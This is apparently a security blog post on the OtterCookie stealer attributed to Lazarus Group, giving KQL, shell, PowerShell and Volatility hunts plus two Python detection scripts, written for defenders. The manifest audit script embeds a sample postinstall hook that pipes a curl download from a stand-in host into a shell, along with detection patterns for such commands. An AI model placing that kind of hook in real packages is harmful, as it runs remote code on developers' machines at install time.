A new malware named OtterCookie has been attributed to North Korea's Lazarus Group. This stealer is delivered through fake job offers and seemingly legitimate Node.js repositories, targeting finance and tech professionals. It exfiltrates:
– Browser credentials
– macOS keychain data
– Cryptocurrency wallets
Rather than dropping a standalone binary, OtterCookie runs as JavaScript inside a legitimate Node.js process, which makes it harder to catch with file-based detection alone.
You Should Know:
1. Detecting OtterCookie with KQL
Use this Kusto Query Language (KQL) query in Microsoft Defender XDR advanced hunting to find Node.js started with a debugger or preload flag. Match on the image name rather than the string "Node.js", which rarely appears in a command line, and keep the parent process in the output so you can tell a developer's terminal from a script-launched instance:
DeviceProcessEvents
| where FileName =~ "node.exe"
| where ProcessCommandLine has_any ("--inspect", "--inspect-brk", "--require")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, ProcessCommandLine
Narrow on InitiatingProcessFileName (for example cmd.exe, powershell.exe or wscript.exe) once you know what is normal in your environment. These flags are also used by legitimate tooling such as ts-node and test runners, so a hit is a lead to triage, not a verdict.
2. Linux/macOS Threat Hunting
List Node.js processes started with debugging or preload flags. The bracketed [n] keeps grep from matching its own command line, and .* allows the flag to appear anywhere in the argument list, not only directly after node:
ps -eo pid,ppid,user,args | grep -E '[n]ode\b.*(--inspect|--require| -r )'
List the network connections held by node processes (-c selects by command name):
lsof -c node -i -P -n
3. Windows Command for Process Analysis
Get-Process does not expose the command line, and -like "node" without wildcards never matches a full path. Query Win32_Process instead, which carries the command line and parent PID, and resolve the parent name in the same pass:
Get-CimInstance Win32_Process -Filter "Name = 'node.exe'" | ForEach-Object { [pscustomobject]@{ PID = $_.ProcessId; Parent = (Get-Process -Id $_.ParentProcessId -ErrorAction SilentlyContinue).Name; CommandLine = $_.CommandLine } }
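The three hunts above express the same triage rule for three platforms: a node process carrying a debugger or preload flag, weighted by what launched it. The following script is an added example (not code from the original post or from any vendor) that applies that rule to a list of process events so the logic can be tested offline; the events, the parent-process baseline and the device names are constructed for illustration.

```python
"""Triage process events for Node.js started with debugger or preload flags.

Added example, not code from the original post. The sample events are
constructed telemetry, not real captures.
"""
import re
import shlex
from dataclasses import dataclass

# Flags that attach a debugger or preload a module into a node process.
# Developer tooling (ts-node, test runners) uses them too, so a hit is
# a lead that needs parent-process and network context, not a verdict.
DEBUG_FLAGS = {"--inspect", "--inspect-brk", "--require", "-r"}

# Parents that rarely launch node in a normal developer workflow
# (hypothetical baseline; tune it to your environment).
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe",
                      "osascript", "curl", "sh"}


@dataclass
class ProcessEvent:
    device: str
    parent: str      # image name of the initiating process
    cmdline: str     # full command line of the new process


def node_flags(cmdline: str) -> set:
    """Return the debug/preload flags present if cmdline launches node."""
    try:
        # posix=False keeps Windows backslashes and quoted paths intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:            # unbalanced quote in the command line
        argv = cmdline.split()
    if not argv:
        return set()
    exe = re.split(r"[\\/]", argv[0].strip("\"'"))[-1].lower()
    if exe not in ("node", "node.exe"):
        return set()
    found = set()
    for arg in argv[1:]:
        if arg.startswith("-"):
            # "--inspect=9229" and "--require=./x.js" carry a value
            found.update({arg.split("=", 1)[0]} & DEBUG_FLAGS)
    return found


def triage(events):
    """Return one finding per node process that carries a debug flag."""
    findings = []
    for ev in events:
        flags = node_flags(ev.cmdline)
        if not flags:
            continue
        findings.append({
            "device": ev.device,
            "parent": ev.parent,
            "flags": sorted(flags),
            "suspicious_parent": ev.parent.lower() in SUSPICIOUS_PARENTS,
        })
    # Script-launched instances first; developer shells last.
    findings.sort(key=lambda f: not f["suspicious_parent"])
    return findings


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    ProcessEvent("dev-mac", "zsh",
                 "node -r ts-node/register src/server.ts"),
    ProcessEvent("WS-01", "cmd.exe",
                 r'"C:\Program Files\nodejs\node.exe" --inspect=9229 '
                 r'C:\Users\a\AppData\Local\Temp\p.js'),
    ProcessEvent("dev-mac", "Code Helper",
                 "node /Users/a/proj/node_modules/.bin/jest"),
    ProcessEvent("WS-02", "powershell.exe",
                 r"node.exe C:\repo\index.js"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Only the two events with a flag are reported, and the cmd.exe-launched instance running a script out of a Temp directory is ranked above the developer's ts-node session. The powershell.exe-launched node with no flag is deliberately not reported: it is outside the rule the hunts above encode, and broadening the rule is a separate decision.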
4. Blocking Malicious Repos
If you're a developer, verify Node.js dependencies before running anything from a repository you were sent:
npm audit
Install with lifecycle scripts disabled so preinstall and postinstall hooks cannot execute while you are still reviewing the code:
npm install --ignore-scripts
Check the resolved dependency tree for a known bad package (replace suspicious-package with the name from the advisory you are acting on):
npm ls --all | grep -i "suspicious-package"
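The dependency checks above catch known-bad package names; the lure repositories described in this post rely instead on code that runs the moment you install. The following script is an added example (not code from the original post or from npm) of a manifest audit for that case: it flags install-time lifecycle scripts that evaluate inline code, pipe a download into a shell or reference remote URLs, and dependencies sourced from outside the registry. The package.json it audits is constructed, and example.invalid is a reserved non-resolving domain.

```python
"""Audit a package.json for lifecycle scripts and dependency sources that
can execute code at install time.

Added example, not code from the original post or from npm. The manifest
below is constructed for illustration.
"""
import json
import re

# npm runs these automatically during `npm install`; a script here runs
# before anyone has read the repository's code.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Patterns that have no business in an install hook. Each hit is a lead
# to read the script, not proof of compromise.
PATTERNS = {
    "inline-eval": re.compile(r"\bnode(\.exe)?\s+(-e|--eval)\b"),
    "download-and-run": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b"),
    "base64-blob": re.compile(r"base64", re.IGNORECASE),
    "remote-fetch": re.compile(r"https?://"),
}

# Dependency specs that bypass the registry: git URLs, tarball URLs,
# local paths and GitHub shorthand (owner/repo).
NON_REGISTRY = re.compile(r"(://|^git\+|^github:|^file:|^[\w.-]+/[\w.-]+(#.*)?$)")


def audit_manifest(text: str):
    """Return a list of findings ({where, issue, value}) for a package.json."""
    pkg = json.loads(text)
    findings = []
    for name, cmd in pkg.get("scripts", {}).items():
        if name not in LIFECYCLE:
            continue
        for issue, rx in PATTERNS.items():
            if rx.search(cmd):
                findings.append({"where": f"scripts.{name}",
                                 "issue": issue, "value": cmd})
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep, spec in pkg.get(section, {}).items():
            if NON_REGISTRY.search(spec):
                findings.append({"where": f"{section}.{dep}",
                                 "issue": "non-registry-source", "value": spec})
    return findings


# Constructed manifest in the style of a "take-home task" lure.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "nft-marketplace-demo",
  "version": "1.0.0",
  "scripts": {
    "start": "node server.js",
    "test": "jest",
    "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/s | sh')\""
  },
  "dependencies": {
    "express": "^4.18.2",
    "web3-utils-helper": "git+https://example.invalid/repo.git"
  }
}'''

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_PACKAGE_JSON):
        print(f"{f['where']}: {f['issue']}: {f['value']}")
```

Run it against a cloned repository's package.json before the first npm install; a postinstall hook that evaluates inline code and pulls from a URL is reason enough to stop and open the file, regardless of what npm audit says about the registry packages.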
5. Memory Forensics (Volatility)
List Node.js processes in a memory dump (Volatility 2 syntax; the profile must match the captured OS build):
volatility -f memory.dump --profile=Win10x64_19041 pslist | grep -i "node"
The cmdline plugin shows the flags and script path each process was started with, and memdump -p <PID> -D out/ writes a process's memory to disk so the JavaScript payload and any C2 addresses can be recovered with strings. In Volatility 3 the equivalents are windows.pslist, windows.cmdline and windows.memmap --dump --pid <PID>.
What Undercode Say:
OtterCookie exemplifies fileless malware trends, leveraging trusted tools like Node.js. Defenders must:
– Monitor debugging and preload flags (--inspect, --require) on node processes, and baseline which developer tools legitimately use them.
– Restrict unauthorized Node.js execution via AppLocker or WDAC (Windows) or SELinux (Linux).
– Analyze network traffic for C2 communications, starting with node processes that hold outbound connections.
Expected Output:
- Detected Node.js processes with unusual arguments.
- Identified lateral movement via PowerShell or WMI.
- Blocked malicious npm packages in CI/CD pipelines.
Prediction:
Lazarus Group will likely enhance OtterCookie’s evasion by:
- Using legitimate CDNs for payload delivery.
- Polymorphic scripting to bypass signature-based detection.
- Targeting cloud developer environments (e.g., VS Code extensions).
Stay vigilant—assume every job offer attachment is malicious. 🛡️
Reported By: 0x534c Cybersecurity – Hackers Feeds